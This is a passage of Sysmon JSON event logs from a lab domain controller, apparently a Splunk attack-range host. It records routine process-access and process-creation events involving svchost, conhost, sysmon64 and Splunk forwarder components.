Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8018,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.709\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.709","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8019,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.709\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.709","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8020,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.709\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2294-5F25-0000-001058C90F00}\r\nTargetProcessId: 4772\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.709","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2294-5F25-0000-001058C90F00}","TargetProcessId":"4772","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8021,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.850\r\nSourceProcessGUID: {41C8662E-2294-5F25-0000-001058C90F00}\r\nSourceProcessId: 4772\r\nSourceThreadId: 4416\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.850","SourceProcessGUID":"{41C8662E-2294-5F25-0000-001058C90F00}","SourceProcessId":"4772","SourceThreadId":"4416","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8022,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:45.835\r\nProcessGuid: {41C8662E-2295-5F25-0000-0010B5CC0F00}\r\nProcessId: 228\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:06:45.835","ProcessGuid":"{41C8662E-2295-5F25-0000-0010B5CC0F00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8023,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:45.834\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2295-5F25-0000-0010B5CC0F00}\r\nTargetProcessId: 228\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:45.834","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2295-5F25-0000-0010B5CC0F00}","TargetProcessId":"228","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8024,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:45.834\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2295-5F25-0000-0010B5CC0F00}\r\nTargetProcessId: 228\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:45.834","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2295-5F25-0000-0010B5CC0F00}","TargetProcessId":"228","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8025,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:45.834\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:45.834","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8026,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:45.834\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 